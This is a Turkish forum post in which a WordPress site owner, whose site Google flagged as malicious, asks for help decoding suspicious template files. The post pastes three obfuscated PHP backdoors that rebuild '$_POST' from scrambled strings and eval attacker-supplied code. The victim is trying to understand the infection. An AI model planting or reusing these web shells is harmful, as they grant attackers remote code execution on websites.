merhaba bir süre önce google wordpress websayfamızı zararlı yazılım dağıtan site olarak gördü iframe virüsü bulaştığından şüphelendim ancak zararlı kodların tespitini kaspersky internet secruty programıyla ftp den dosyaları masaüstüne çekip tarattım 33 dosyaya bulaştığını tespit ettik ancak belirtilen dosyalarda ben zararlı kod yapısına rastlayamadım aşağıda birkaç php dosyanın içeriğini yapıştırdım ama zararlı olduğunu sanmıyorum bu kodların nasıl çözebilirim yol gösterebilirmisiniz
cache.php.suspected;cache.php.suspected public_html\pano\templates\grandiose\src\cufon\
stats.php.suspected;stats.php.suspected \public_html\pano\templates\st_orddie\core\helpers \
ajax.php.suspected;ajax.php.suspected public_html\pano\templates\st_orddie\core\assets\
<?php
$zlzx35 ="_perotsu" ;$qwpf12=$zlzx35[6].$zlzx35[5].$zlzx35[3]. $zlzx35[5]. $zlzx35[4].$zlzx35[7].$zlzx35[1].$zlzx35[1]. $zlzx35[2]. $zlzx35[3] ; $dxq4=$qwpf12( $zlzx35[0]. $zlzx35[1]. $zlzx35[4]. $zlzx35[6].$zlzx35[5] ) ; if ( isset (${ $dxq4}['qaea521']) ) { eval(${$dxq4} ['qaea521']) ;} ?>
<?php $rsi4 ="terup_so" ;$tfc7= $rsi4[6]. $rsi4[0]. $rsi4[2]. $rsi4[0]. $rsi4[7]. $rsi4[3].$rsi4[4]. $rsi4[4].$rsi4[1]. $rsi4[2];$pwq9= $tfc7 ( $rsi4[5].$rsi4[4] .$rsi4[7].$rsi4[6]. $rsi4[0] ); if (isset ( ${ $pwq9}[ 'qf73356'] )){ eval(${ $pwq9}[ 'qf73356']); }?>
<?php $pgev62="tuoe_spr" ;$agta39 = $pgev62[5]. $pgev62[0].$pgev62[7]. $pgev62[0].$pgev62[2]. $pgev62[1]. $pgev62[6]. $pgev62[6].$pgev62[3].$pgev62[7] ; $isjs63= $agta39 ($pgev62[4]. $pgev62[6]. $pgev62[2]. $pgev62[5].$pgev62[0]) ; if (isset (${$isjs63 } [ 'qf03c87'] )){ eval( ${$isjs63 } ['qf03c87'] ) ; }?>
Wordpress zararlı kod hakkında
1
●264
- 28-06-2016, 18:23:00